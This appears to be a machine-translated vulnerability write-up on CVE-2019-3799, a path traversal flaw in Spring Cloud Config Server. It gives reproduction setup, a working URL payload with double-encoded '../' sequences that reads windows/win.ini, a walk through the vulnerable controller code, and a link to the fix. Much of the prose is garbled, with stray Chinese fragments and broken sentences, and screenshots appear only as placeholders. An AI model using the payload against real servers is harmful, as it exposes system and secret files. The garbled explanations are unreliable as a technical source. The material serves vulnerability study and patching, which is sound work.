CVE-2019-3799 Spring-Cloud-Config-Server Road Path Penetration / Arbitrary Documents

Recovery

idea Joined in pom.xml

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-config-server</artifactId>
    <version>2.0.2.RELEASE</version>
</dependency>

配置application.properties

server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git

After all http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini image.png

analysis

Spring Cloud Config Server is Spring, distributed expression management, client can pass http format 获tori placement 值. payload opposite routing existence in ʻorg.springframework.cloud.config.server.resource.ResourceController # retrieve () `in the middle of the generation

    @RequestMapping({"/{name}/{profile}/{label}/**"})
    public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
        String path = this.getFilePath(request, name, profile, label);
        return this.retrieve(name, profile, label, path, resolvePlaceholders);
    }

{name} / {profile} / {label}: name op. 结 库 name, profile op. During the actual measurement, name, profile, and label are required. Debug getFilePath image.png This 边 续 跟 retrieve (), 继 续 跟 retrieve (), this 边 path

image.png

FindOne, rank in ʻorg.springframework.cloud.config.server.resource.GenericResourceRepository # findOne`

image.png Locations list file: / C: / Users / icu / AppData / Local / Temp / config-repo-6608031716294156148 / Tori.

Repair

https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

image.png

Special characters such as % coming urldecode, matchmaking ../, ..,/, etc.

reference

  1. [Spring-Cloud-Config-Server-Arbitrary text analysis](http://www.lmxspace.com/2019/04/26/Spring-Cloud-Config-Server-%E4%BB%BB%E6 % 84% 8F% E6% 96% 87% E4% BB% B6% E8% AF% BB% E5% 8F% 96% E5% 88% 86% E6% 9E% 90 /)

Recommended Posts

CVE-2019-3799 Spring-Cloud-Config-Server Road Path Penetration / Arbitrary Documents